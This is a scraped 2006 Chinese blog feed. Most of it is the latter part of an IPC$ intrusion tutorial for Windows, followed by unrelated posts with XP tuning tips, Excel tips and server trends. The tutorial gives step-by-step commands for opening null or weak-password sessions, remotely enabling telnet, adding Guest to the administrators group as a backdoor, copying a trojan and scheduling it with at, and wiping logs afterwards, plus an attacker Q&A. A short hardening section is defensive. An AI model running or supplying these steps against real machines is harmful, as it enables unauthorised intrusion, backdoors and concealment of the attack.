错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<font color="#9900ff"><strong>八 复制文件失败的原因</strong></font><br />
<br />
<br />
有些朋友虽然成功的建立了ipc$连接，但在copy时却遇到了这样那样的麻烦，无法复制成功，那么导致复制失败的常见原因又有哪些呢？<br />
<br />
<br />
1 盲目复制<br />
这类错误出现的最多，占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹，就进行盲目复制，结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况，不要认为ipc$连接建立成功了就一定有共享文件夹。<br />
<br />
<br />
2 默认共享判断错误<br />
这类错误也是大家经常犯的，主要有两个小方面：<br />
<br />
1）错误的认为能建立ipc$连接的主机就一定开启了默认共享，因而在建立完连接之后马上向admin$之类的默认共享复制文件，导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享，ipc$共享与默认共享是两码事，ipc$共享是一个命名管道，并不是哪个实际的文件夹，而默认共享并不是ipc$共享的必要条件；<br />
<br />
2）由于net view \\IP 无法显示默认共享（因为默认共享带$），因此通过这个命令，我们并不能判断对方是否开启了默认共享，因此如果对方未开启默认共享，那么所有向默认共享进行的操作都不能成功；（不过大部分扫描软件在扫弱口令的同时，都能扫到默认共享目录，可以避免此类错误的发生）<br />
<br />
<br />
3用户权限不够，包括四种情形：<br />
1）空连接向所有共享（默认共享和普通共享）复制时，大多情况下权限是不够的；<br />
2）向默认共享复制时，要具有管理员权限；<br />
3）向普通共享复制时，要具有相应权限（即对方事先设定的访问权限）；<br />
4）对方可以通过防火墙或安全软件的设置，禁止外部访问共享；<br />
<br />
还需要说明一点：不要认为administrator就一定是管理员，管理员名称是可以改的。<br />
<br />
<br />
4被防火墙杀死或在局域网<br />
也许你的复制操作已经成功，但当远程运行时，被防火墙杀掉了，导致找不到文件；还有可能你把木马复制到了局域网内的主机，导致连接失败。因此建议你复制时要小心，否则就前功尽弃了。<br />
<br />
<br />
呵呵，大家也知道，ipc$连接在实际操作过程中会出现千奇百怪的问题，上面我所总结的只是一些常见错误，没说到的，只能让大家自己去体会了。<br />
<br />
<br />
<font color="#9900ff"><strong>九 如何打开目标的IPC$共享以及其他共享</strong></font><br />
<br />
<br />
目标的ipc$不是轻易就能打开的，否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等，然后在shell下执行net share ipc$来开放目标的ipc$，用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹，你可以用net share baby=c:\，这样就把它的c盘开为共享名为baby共享了。<br />
<br />
<br />
<font color="#9900ff"><strong>十 一些需要shell才能完成的命令</strong></font><br />
<br />
<br />
看到很多教程这方面写的十分不准确，一些需要shell才能完成命令就简简单单的在ipc$连接下执行了，起了误导作用。那么下面我总结一下需要在shell才能完成的命令：<br />
<br />
1 向远程主机建立用户，激活用户，修改用户密码，加入管理组的操作需要在shell下完成；<br />
<br />
2 打开远程主机的ipc$共享，默认共享，普通共享的操作需要在shell下完成；<br />
<br />
3 运行/关闭远程主机的服务，需要在shell下完成；<br />
<br />
4 启动/杀掉远程主机的进程，也需要在shell下完成。<br />
<br />
<br />
<font color="#9900ff"><strong>十一 入侵中可能会用到的相关命令</strong></font><br />
<br />
<br />
请注意命令适用于本地还是远程，如果适用于本地，你只能在获得远程主机的shell后，才能向远程主机执行。<br />
<br />
1 建立空连接:<br />
net use \\IP\ipc$ &quot;&quot; /user:&quot;&quot;<br />
<br />
2 建立非空连接:<br />
net use \\IP\ipc$ &quot;psw&quot; /user:&quot;account&quot;<br />
<br />
3 查看远程主机的共享资源（但看不到默认共享）<br />
net view \\IP<br />
<br />
4 查看本地主机的共享资源（可以看到本地的默认共享）<br />
net share<br />
<br />
5 得到远程主机的用户名列表<br />
nbtstat -A IP<br />
<br />
6 得到本地主机的用户列表<br />
net user<br />
<br />
7 查看远程主机的当前时间<br />
net time \\IP<br />
<br />
8 显示本地主机当前服务<br />
net start<br />
<br />
9 启动/关闭本地服务<br />
net start 服务名 /y<br />
net stop 服务名 /y<br />
<br />
10 映射远程共享:<br />
net use z: \\IP\baby<br />
此命令将共享名为baby的共享资源映射到z盘<br />
<br />
11 删除共享映射<br />
net use c: /del 删除映射的c盘，其他盘类推<br />
net use * /del /y删除全部<br />
<br />
12 向远程主机复制文件<br />
copy \路径\srv.exe \\IP\共享目录名，如：<br />
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内<br />
<br />
13 远程添加计划任务<br />
at \\ip 时间 程序名，如：<br />
at \\127.0.0.0 11:00 love.exe<br />
注意：时间尽量使用24小时制；在系统默认搜索路径（比如system32/）下不用加路径，否则必须加全路径<br />
<br />
<br />
14 开启远程主机的telnet<br />
这里要用到一个小程序：opentelnet.exe，各大下载站点都有，而且还需要满足四个要求：<br />
<br />
1）目标开启了ipc$共享<br />
2）你要拥有管理员密码和帐号<br />
3）目标开启RemoteRegistry服务，用户就该ntlm认证<br />
4）对WIN2K/XP有效，NT未经测试<br />
命令格式：OpenTelnet.exe \\server account psw NTLM认证方式 port<br />
试例如下：c:\&gt;OpenTelnet.exe \\*.*.*.* administrator &quot;&quot; 1 90<br />
<br />
15 激活用户/加入管理员组<br />
1 net uesr account /active:yes<br />
2 net localgroup administrators account /add<br />
<br />
16 关闭远程主机的telnet<br />
同样需要一个小程序：ResumeTelnet.exe<br />
命令格式：ResumeTelnet.exe \\server account psw<br />
试例如下：c:\&gt;ResumeTelnet.exe \\*.*.*.* administrator &quot;&quot;<br />
<br />
17 删除一个已建立的ipc$连接<br />
net use \\IP\ipc$ /del<br />
<br />
<font color="#9900ff"><strong>十二 ipc$完整入侵步骤详解</strong></font><br />
<br />
其实入侵步骤随个人爱好有所不同，我就说一下常见的吧，呵呵，献丑了！<br />
<br />
1 用扫描软件搜寻存在若口令的主机，比如流光，SSS，X-scan等，随你的便，然后锁定目标，如果扫到了管理员权限的口令，你可以进行下面的步骤了，假设你现在得到了administrator的密码为空<br />
<br />
<br />
2 此时您有两条路可以选择：要么给对方开telnet（命令行）,要么给它传木马（图形界面），那我们就先走telnet这条路吧<br />
<br />
<br />
3上面开telnet的命令没忘吧，要用到opentelnet这个小程序<br />
c:\&gt;OpenTelnet.exe \\192.168.21.* administrator &quot;&quot; 1 90<br />
如果返回如下信息<br />
*******************************************************<br />
Remote Telnet Configure, by refdom<br />
Email:refdom@263.net<br />
OpenTelnet.exe<br />
<br />
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport<br />
*******************************************************<br />
Connecting \\192.168.21.*...Successfully!<br />
<br />
NOTICE!!!!!!<br />
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23<br />
<br />
Starting telnet service...<br />
telnet service is started successfully! telnet service is running!<br />
<br />
BINGLE!!!Yeah!!<br />
Telnet Port is 90. You can try:&quot;telnet ip 90&quot;, to connect the server!<br />
Disconnecting server...Successfully!<br />
*说明你已经打开了一个端口90的telnet。<br />
<br />
<br />
4 现在我们telnet上去<br />
telnet 192.168.21.* 90<br />
如果成功，你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了，那么做点什么呢？把guest激活再加入管理组吧，就算留个后门了<br />
<br />
<br />
5 C:\&gt;net user guest /active:yes<br />
*将Guest用户激活，也有可能人家的guest本来就试活的，你可以用net user guest看一下它的帐户启用的值是yes还是no<br />
<br />
<br />
6 C:\&gt;net user guest 1234<br />
*将Guest的密码改为1234,或者改成你喜欢的密码<br />
<br />
<br />
7 C:\&gt;net localgroup administrators guest /add<br />
*将Guest变为Administrator，这样，即使以后管理员更改了他的密码，我们也可以用guest登录了，不过也要提醒您，因为通过安全策略的设置，可以禁止guest等帐户的远程访问，呵呵，如果真是这样，那我们的后门也就白做了，愿上帝保佑Guest。<br />
<br />
<br />
8 好了，现在我们来走另一条路，给它传个木马玩玩<br />
<br />
<br />
9 首先，我们先建立起ipc$连接<br />
C:\&gt;net use \\192.168.21.*\ipc$ &quot;&quot; /user:administrator<br />
<br />
<br />
10 既然要上传东西，就要先知道它开了什么共享<br />
C:\&gt;net view \\192.168.21.*<br />
在 \\192.168.21.*的共享资源<br />
资源共享名 类型 用途 注释<br />
<br />
-----------------------------------------------------------<br />
C Disk<br />
D Disk<br />
命令成功完成。<br />
*好了，我们看到对方共享了C,D两个盘，我们下面就可以向任意一个盘复制文件了。再次声明，因为用net view命令无法看到默认共享，因此通过上面返回的结果，我们并不能判断对方是否开启了默认共享。<br />
<br />
<br />
11 C:\&gt;copy love.exe \\192.168.21.*\c<br />
已复制 1 个文件<br />
*用这个命令你可以将木马客户端love.exe传到对方的c盘下，当然，如果能复制到系统文件夹下是最好的了，不容易被发现<br />
<br />
<br />
12 运行木马前，我们先看看它现在的时间<br />
net time \\192.168.21.*<br />
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00<br />
命令成功完成<br />
<br />
<br />
13 现在我们用at运行它吧，不过对方一定要开了Task Scheduler服务（允许程序在指定时间运行），否则就不行了<br />
C:\&gt;at \\192.168.21.* 11:02 c:\love.exe<br />
新加了一项作业，其作业 ID = 1<br />
</p>
<p>4 剩下就是等了，等过了11:02，你就可以用控制端去连接了，如果成功你将可以用图形界面去控制远程主机了，如果连接失败，那么它可能在局域网里，也可能程序被防火墙杀了，还可能它下线了（没这么巧吧），无论哪种情况你只好放弃了<br />
<br />
<br />
嗯，好了，两种基本方法都讲了。如果你对上面的操作已经轻车熟路了，也可以用更高效的套路，比如用CA克隆guest，用psexec执行木马，用命令：psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等，这些都是可以得，随你的便。不过最后不要忘了把日志清理干净，可以用榕哥的elsave.exe。<br />
讲了ipc$的入侵，就不能不说如何防范，那么具体要怎样做呢？看下面<br />
<br />
<br />
<font color="#9900ff"><strong>十三 如何防范ipc$入侵</strong></font><br />
<br />
<br />
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)<br />
<br />
方法1：<br />
运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1<br />
如果设置为&quot;1&quot;，一个匿名用户仍然可以连接到IPC$共享，但限制通过这种连接得到列举SAM帐号和共享等信息；在Windows 2000 中增加了&quot;2&quot;，限制所有匿名访问除非特别授权，如果设置为2的话,可能会有一些其他问题发生，建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。<br />
<br />
方法2：<br />
在本地安全设置－本地策略－安全选项－在'对匿名连接的额外限制'中做相应设置<br />
<br />
<br />
2 禁止默认共享<br />
<br />
1）察看本地共享资源<br />
运行-cmd-输入net share<br />
<br />
2）删除共享（重起后默认共享仍然存在）<br />
net share ipc$ /delete<br />
net share admin$ /delete<br />
net share c$ /delete<br />
net share d$ /delete（如果有e,f,&hellip;&hellip;可以继续删除）<br />
<br />
3）停止server服务<br />
net stop server /y （重新启动后server服务会重新开启）<br />
<br />
4）禁止自动打开默认共享（此操作并未关闭ipc$共享）<br />
运行-regedit<br />
<br />
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。<br />
<br />
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。<br />
如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。<br />
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加。<br />
<br />
<br />
3 关闭ipc$和默认共享依赖的服务:server服务<br />
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用<br />
这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于lanmanserver，不要管它。<br />
<br />
<br />
4 屏蔽139，445端口<br />
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。<br />
<br />
1）139端口可以通过禁止NBT来屏蔽<br />
本地连接－TCP/IT属性－高级－WINS－选&lsquo;禁用TCP/IT上的NETBIOS&rsquo;一项<br />
<br />
2）445端口可以通过修改注册表来屏蔽<br />
添加一个键值<br />
Hive: HKEY_LOCAL_MACHINE<br />
Key: System\Controlset\Services\NetBT\Parameters<br />
Name: SMBDeviceEnabled<br />
Type: REG_DWORD<br />
Value: 0<br />
修改完后重启机器<br />
<br />
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。<br />
<br />
<br />
3）安装防火墙进行端口过滤<br />
<br />
<br />
5 设置复杂密码，防止通过ipc$穷举出密码。<br />
<br />
<br />
<font color="#9900ff"><strong>十四 ipc$入侵问答精选</strong></font><br />
<br />
<br />
上面说了一大堆的理论东西，但在实际中你会遇到各种各样的问题，因此为了给予大家最大的帮助，我看好几个安全论坛，找了n多的帖子，从中整理了一些有代表性的问答，其中的一些答案是我给出的，一些是论坛上的回复，如果有什么疏漏和错误，还请包涵。<br />
<br />
<br />
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？<br />
<br />
答：留下记录是一定的，你走后用程序删除就可以了，或者用肉鸡入侵。<br />
<br />
<br />
2.你看下面的情况是为什么，可以连接但不能复制<br />
net use \\***.***.***.***\ipc$ &quot;密码&quot; /user:&quot;用户名&quot;<br />
命令成功<br />
copy icmd.exe \\***.***.***.***\admin$<br />
找不到网络路径<br />
命令不成功<br />
<br />
答：可能有两个原因：<br />
1）你的权限不够，不能访问默认共享；<br />
<br />
2）对方没有开启admin$默认共享，不要认为能进行ipc$连接，对方就一定开了默认共享（很多人都这么以为，误区！！），此时你可以试试别的默认共享或普通共享，比如c$,d$,c,d等，如果还是不行，就要看你的权限了，如果是管理员权限，你可以开telnet,如果能成功，在给它开共享也行。<br />
<br />
<br />
3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？<br />
<br />
答：建议先用流光或者别的什么猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。<br />
<br />
<br />
4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？<br />
<br />
答：首先纠正你的一个错误，用net view是无法看到默认共享的。既然你现在有管理员权限，而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后，做什么都可以了。<br />
<br />
<br />
5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？<br />
net uset ccbirds /add<br />
<br />
答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell,只有在获得一个shell之后，你才能在远程建立一个帐户，否则你的操作只是在本地进行。<br />
<br />
<br />
6.我已进入了一台肉机，用的管理员帐号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示&ldquo;拒绝访问，已复制0个文件&rdquo;，是不是对方有什么服务没开，我该怎么办？<br />
<br />
答：不能copy文件有多个可能，除了权限不够外，还可能是对方c$,d$等默认管理共享没开，或者是对方为NTFS文件格式，通过设置，管理员也未必能远程写文件。既然你有管理员权限，那就开telnet上去吧，然后在开它的共享。<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
7.我用Win98能与对方建立ipc$连接吗？<br />
<br />
答：不可以的，要进行ipc$的操作，建议用win2000<br />
<br />
<br />
8.我用net use \\ip\ipc$ &quot;&quot; /user &quot;&quot;成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？<br />
<br />
答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；或者你自己的NBT没有打开，netstat是建立在NBT之上的。　　<br />
<br />
<br />
9.我建立ipc$连接的时候返回如下信息：&lsquo;提供的凭据与已存在的凭据集冲突&rsquo;，怎么回事？<br />
<br />
答：呵呵，这说明你与目标主机建立了一个以上的ipc$连接，这是不允许的，把其他的删掉吧：net use \\*.*.*.*\ipc$ /del<br />
<br />
<br />
10.我在映射的时候出现：<br />
F:\&gt;net use h: \\211.161.134.*\e$<br />
系统发生 85 错误。<br />
本地设备名已在使用中。这是怎么回事？<br />
<br />
答：你也太粗心了吧，这说明你的h盘正在使用，映射到别的盘符吧！<br />
<br />
<br />
11.我建立了一个连接f:\&gt;net use \\*.*.*.*\ipc$ &quot;123&quot; /user:&quot;ccbirds&quot; 成功了，但当我映射时出现了错误，向我要密码，怎么回事？<br />
F:\&gt;net use h: \\*.*.*.*\c$<br />
密码在 \\*.*.*.*\c$ 无效。<br />
请键入 \\*.*.*.*\c$ 的密码:<br />
系统发生 5 错误。<br />
拒绝访问。<br />
<br />
答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。<br />
<br />
<br />
12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？<br />
<br />
答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.<br />
<br />
<br />
13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator帐号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？<br />
<br />
答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。<br />
<br />
<br />
14.我用net use \\192.168.0.2\ipc$ &quot;password&quot; /user:&quot;administrator&quot; 成功，可是 net use i: \\192.168.0.2\c<br />
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？<br />
<br />
答：虽然你具有管理员权限，但管理员在设置c盘共享权限时可能并未设置允许administrator访问，所以会出现问题。<br />
<br />
<br />
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc连接别的机器？<br />
<br />
答：可以的。<br />
</p>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/zfjC58n6u+4=.html">网络生活</label>
         	                  <pubDate>2006/11/04 09:53:59</pubDate>
      </item>
            <item>
         <title><![CDATA[ 23招打造极速WINXP   ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b0-i557180.html]]></link>
                          <description>
                   <![CDATA[23招打造极速WINXP  <br><br> <br><br><br>以往我们经常使用"碎片整理"使Windows运行的更快.但现在市场上出售的7200转硬盘，在寻道和传输两方面做了改进，有很多型号还附带有一个8M缓存，而且WinXP使用的NTFS文件系统比FAT系统更有效率。因此，"碎片整理"对提升电脑性能的作用已经非常有限。下面给出能够大幅提升电脑性能，让WinXP运行更快捷 、更可靠的23招实用技巧，希望对您有所帮助 ： <br><br><br>　　1)在系统中安装Ultra-133硬盘加速扩充卡或带有8M缓存的ATA硬盘，可以有效减少系统的启动时间。 <br><br>　　2)把内存增加到512M以上。 <br><br>　　3)确定Windows XP使用的是NTFS文件系统。检查方法 ：双击"我的电脑"，在C ：盘上右击鼠标，选择"属性"，检查文件系统的类型。如果是FAT32，就把它转换成NTFS，方法是 ：先备份所有重要的数据，然后选择"开始"菜单里的"运行"，输入CMD后确认。在提示符下，输入CONVERT C ： /FS ：NTFS和回车。在这个过程中，最好不要中途异常中断，并确保系统中没有病毒。 <br><br>　　4)关闭文件索引功能。Windows索引服务要从硬盘上大量文件中提取信息并创建"关键字索引"，如果硬盘上有数以千计的文件，这个功能可以加快从这些文件中搜索信息的速度。但Windows创建这个索引要花费很多时间，而且大多数人从来不使用这个功能。关闭的方法是 ：双击"我的电脑"，在硬盘和下面的子文件夹上右击鼠标，选择"属性"，取消"使用索引以便快速查找文件"。如果有警告或错误信息出现(如"拒绝访问")，点击"忽略"即可。 <br><br>　　5)升级主板和显卡的驱动程序，升级BIOS。 <br><br>　　6)每三个月左右清空Windows的预读取文件夹(Windows\Prefetch)一次。Windows把频繁使用的数据存放在预读取文件夹中，需要再次使用这些数据时就可以大大加快读取速度。但时间一长，这个文件夹中就会有大量不再使用的垃圾数据存在，反而增加了Windows的读取时间，影响了系统性能。 <br><br>　　7)每个月运行一次磁盘清理程序，删除临时和无用文件。方法 ：双击"我的电脑"，在C ：盘上右击鼠标，选择"属性"，点击"磁盘清理"按钮。 <br><br>　　8)在"设备管理员"中双击IDE ATA/ATAPI控制器，到Primary/Secondary IDE Channel里将所有连接设备的转输模式都设定为使用DMA(如果可用)。 <br><br>　　9)更新接线.采用了新式的硬盘后，应该同时为所有IDE设备换装80线的Ultra-133线缆。如果只安装一个硬盘，那么这个硬盘应该安装在线缆的顶端，不要安装在线缆中间的那个接口，否则可能发生信号异常。对于Ultra DMA硬盘驱动器来说，这些异常信号会影响驱动器发挥最佳性能。 <br><br>　　10)清除所有spyware(间谍程序)。有很多免费软件，如AdAware，可以完成这个任务。清除后，所以包含spyware的软件都将不能正常工作，如果确实需要其中的某个软件，就把它重新安装一遍吧。 <br><br>　　11)从启动组里删除不必要的程序。方法 ：选择"开始"菜单里的"运行"，输入"msconfig"，进入"启动"选项卡，取消不想在系统启动时加载的项目。对于不能确定的项目，查阅一下"WinTasks Process Library"(进程库)，里面包含了已知的系统进程、应用程序和spyware的描述。也可以在google等WEB搜索引擎中查找。 <br><br>　　12)进入控制面板中的"增加/删除程序"项，删除不必要的和不用的程序。 <br><br>　　13)关闭所有不必要的动画和活动桌面。方法 ：在控制面板中点击"系统"图标，进入"高级"选项卡，对"性能"进行"设置"，在"视觉效果"选项卡上， 选中"自定义"单选框，将有关用户界面特性设定为禁用状态。 <br><br>　　14)使用Tweak-XP软件编辑系统注册表，进一步提升性能。 <br><br>　　15)定期访问微软Windows更新站点，下载所有标有"Critical(重大)"标志的更新项目。 <br><br>　　16)每周更新防病毒软件。系统中最好只安装一套防病毒软件，安装多套软件会对性能带来不利影响。 <br><br>　　17)安装的字体数量不要超过500种，字体数量太多会使系统变慢。 <br><br>　　18)不要对硬盘分区。Windows XP的NTFS文件系统在一个比较大的分区上运行会更有效率。以前，人们为了方便数据组织或重新安装操作系统时不必格式化整个硬盘而对硬盘进行分区。在Windows XP的NTFS文件系统中，重新安装操作系统已不必重新格式化分区，数据组织更可以通过文件夹来完成。例如，不需要再把大量的数据放到另外划分的D ：盘上，可以创建一个命名为"D盘"的文件夹，数据放在这个文件夹中即不影响系统性能，又能起到很好的组织作用。 <br><br>　　19)测试内存条(RAM)是否完好。建议使用免费程序MemTest86，先用这个程序制作一个启动盘，用此盘启动电脑后程序将对内存条运行10项不同的测试，每项测试进行3遍。如果测试中遇到错误，就关闭电脑，拔掉其中一根内存条(如果有多根的话)，重新测试。仍掉坏的内存条，换上一根好的。 <br><br>　　20)如果电脑上安装了CD或DVD刻录机，有时候升级驱动程序可以使刻录速度更快。 <br><br>　　21)取消不必要的服务。Windows XP调用了许多用户可能根本用不到的服务，这些服务不仅影响运行速度，对保护系统安全也非常不利。因此，可以根据需要禁用不必要的系统服务。方法 ：选择"开始"菜单里的"运行"，输入"Services.msc"打开"服务管理控制台"，通过更改服务的启动类型启动或停止该项服务。 <br><br>　　22)如果感觉Windows的单窗口浏览器速度比较慢，可以加以改进，方法是 ：打开"我的电脑"，点击"工具"->"文件夹选项"->"查看"，选中"使用独立的进程打开文件夹窗口"。这样可以防止一个较慢的设备影响用户界面的响应速度。 <br><br>　　23)打开机箱，把灰尘和碎片打扫干净，每年至少做一次。同时检查一下所有的风扇是否工作正常，主板上的电容器有没有膨胀或泄漏。 <br><br>　　至此，23招都用过一遍，是不是对自己的系统更满意了? <br><br>　　提醒 ：虽然"碎片整理"对提升电脑性能作用有限，但一个没有碎片的硬盘总比一个布满碎片的硬盘消耗的功率少，况且，一旦硬盘损坏，如果硬盘上的数据连续存放，就更容易恢复.所以，仍建议每隔一段时间(根据机器使用情况，从数月到一年不等)，对硬盘做一次"碎片整理"。  <br>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/tKbFrrXY.html">处女地</label>
         	                  <pubDate>2006/04/04 17:48:25</pubDate>
      </item>
            <item>
         <title><![CDATA[ 分享快乐 Excel实用操作技巧九则   ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b0-i557177.html]]></link>
                          <description>
                   <![CDATA[分享快乐 Excel实用操作技巧九则  <br><br><br><br>1、快速输入大写中文数字 <br>　 <br>将光标移至需要输入大写数字的单元格中。利用数字小键盘在单元格中输入相应的小写数字(如12345)。右击该单元格，点击“设置单元格格式”，从弹出的“单元格格式”对话框中选择“数字”选项；然后从“类型”列表框中选择“中文大写数字”选项。最后单击“确定”按钮，这时输入的12345就自动变成“壹万贰仟叁佰肆拾伍”。 <br><br>　　 2、多个工作表的页眉和页脚同时设置 <br><br>　　我们有时要把一个Excel文件中的多个工作表设置成同样的页眉和页脚，分别对一张张工作表去设置感觉很烦琐。如果用下面的方法就可以一次将多个工作表中的页眉和页脚同时设置好：把鼠标移到工作表的名称处(如果没有给每张表取名的话，Excel自动设置的名称就是Sheet1、Sheet2、Sheet3等等)，然后点右键，在弹出的菜单中选择“选择全部工作表”的菜单项，这时再进行页眉和页脚设置就是针对全部工作表了。 <br><br>　　 3、Excel单元格文字随时换行 <br><br>　　在Excel中，我们有时需要在一个单元格中分成几行显示文字等内容。那么实现的方法一般是通过选中格式菜单中的“单元格”下“对齐”的“自动换行”复选项，单击“确定”即可，这种方法使用起来不是特别随心所欲，需要一步步地操作。还有一种方法是：当你需要重起一行输入内容的时候，只要按住Alt键的同时按下回车键就可以了，这种方法又快又方便。 <br><br>　　 4、Excel中插入空白行 <br><br>　　如果想在某一行上面插入几行空白行，可以用鼠标拖动自此行开始选择相应的行数，然后单击右键，选择插入。如果在每一行上面均插入一空白行，按住Ctrl键，依次单击要插入新行的行标按钮，单击右键，选择插入即可。 <br><br>　　 5、Excel中消除0值 <br><br>　　有Excel中当单元格计算结果为0时，默认会显示0，这看起来显然有点碍眼。如果你想显示0时，显示为空白，可以试试下面的方法。打开“工具→选项→视图”，取消“0值”复选项前的√，确定后，当前工作表中的值为0的单元格将全部显示成空白。 <br><br>　　 6、批量转换日期格式 <br><br>　　以前在Excel中输入职工出生时间时，为了简单都输入成“yymmdd”形式，但上级部门一律要求输入成“yyyy-mm-dd”格式，那么一千多名职工出生时间肯定不能每个手工转化。最快速的方法是：先选定要转化的区域。点击“数据→分列”，出现“文本分列向导”对话框。勾选“固定宽度”，连续两次点击“下一步”按钮，在步骤三对话框的“列数据格式”中，选择“日期”，并选定“YMD”形式，按下“完成”按钮，以前的文本即转化成了需要的日期了。 <br><br>　　 7、快速选定“空白”和“数据”单元格 <br><br>　　在Excel中，经常要选定空白单元格，逐个选定比较麻烦，如果使用下面的方法就方便多了：打开“编辑→定位”，在“定位”窗口中，按下“定位条件”按钮；选择“定位条件”中的“空值”，再按“确定”，空白单元格即被全部选定。如果要选定只含数据的单元格，在上面方法的“定位条件”窗口中，选择“常量”，再点“确定”，含有数据的单元格全部选定。 <br><br>　　 8、防止误改有新招 <br><br>　　在包含多个工作表的工作薄中，为了防止误修改，我们常常采取将行(列)隐藏或者设置编辑区域的方法，但是如果要防止整个工作表的误修改怎么办呢?单击“格式→工作表→隐藏”，将当前的工作表隐藏，这样操作者连表格都看不到，误操作就无从谈起了。要重新显示该表格，只须单击“格式→工作表→取消隐藏”。要注意的是：如果设置了工作表保护，则不能进行隐藏操作。 <br><br>　　 9、快速隐藏 <br><br>　　在打印工作表时，我们有时需要把某些行或者列隐藏起来，可是用菜单命令或调整行号(列标)分界线的方法比较麻烦，这时笔者介绍一个简单方法：在英文状态下，按“Ctrl 9”或“Ctrl 0”组合键，就可以快速隐藏光标所在的行或列。  <br>]]>
               </description>
                    <author>智慧电脑</author>
         <category>个人博客</category>
                      <label domain="http://blog.china.alibaba.com/blog/2784477/tag/tKbFrrXY.html">处女地</label>
         	                  <pubDate>2006/04/04 17:47:18</pubDate>
      </item>
            <item>
         <title><![CDATA[ 服务器技术八大走势（转）   ]]></title>
         <link><![CDATA[http://blog.china.alibaba.com/blog/2784477/article/b0-i557174.html]]></link>
                          <description>
                   <![CDATA[服务器技术八大走势（转）  <br><br><br><br><br>64位和双核是目前服务器技术领域众多用户关注的话题，除此之外似乎亮点不多。不过，表面的平静下其实蕴含着惊人的变化。 <br><br>　　未来的服务器将走向哪里？这不仅是众多服务器厂商在思索的问题，也是广大企业用户颇为关心的问题。 <br><br>　　在最近的两三年中，64位和双核的吆喝声太过用力，以致很多用户甚至无法静下心来仔细想想是否还期待其他服务器技术的突破。更有一些激进人士认为，这种声音单调正说明服务器已经步PC后尘，陷入了技术无法再突破的尴尬境地。 <br><br>　　事实是否如此呢？记者近日采访了中国科学院计算技术研究所的孙凝晖博士和曙光研发部总经理曾宇，他们认为，从技术层面看，在2006年乃至未来几年，服务器领域至少有八大趋势是值得我们期待的。 <br><br>　　第一，服务器处理器的多核化趋势进一步彰显。 <br><br>　　虽然说双核/多核已经不是什么新鲜话题，但是孙凝晖博士认为，2005年AMD公司双核Opteron、Intel公司双核Xeon、Sun公司的8核UltraSPARC T1只是拉开了服务器处理器多核化的序幕，在2006年，操作系统及应用软件对多核处理器的进一步支持及优化、65纳米芯片制造工艺的成熟、Intel EIST及AMD PowerNow！为代表的低功耗技术的发展、芯片级虚拟化技术的成熟等诸多因素，将推动服务器处理器多核化趋势的进一步彰显。多核技术将成为2006年服务器技术的重要技术支点，更多的多核服务器处理器也将在2006年隆重登场，包括Intel公司Xeon Dempsey、双核安腾Montecito、AMD公司的四核Opteron、Sun公司的NiagaraⅡ等等，都是值得期待的，它们将带来更多、更彻底的多核服务器形态。 <br><br>　　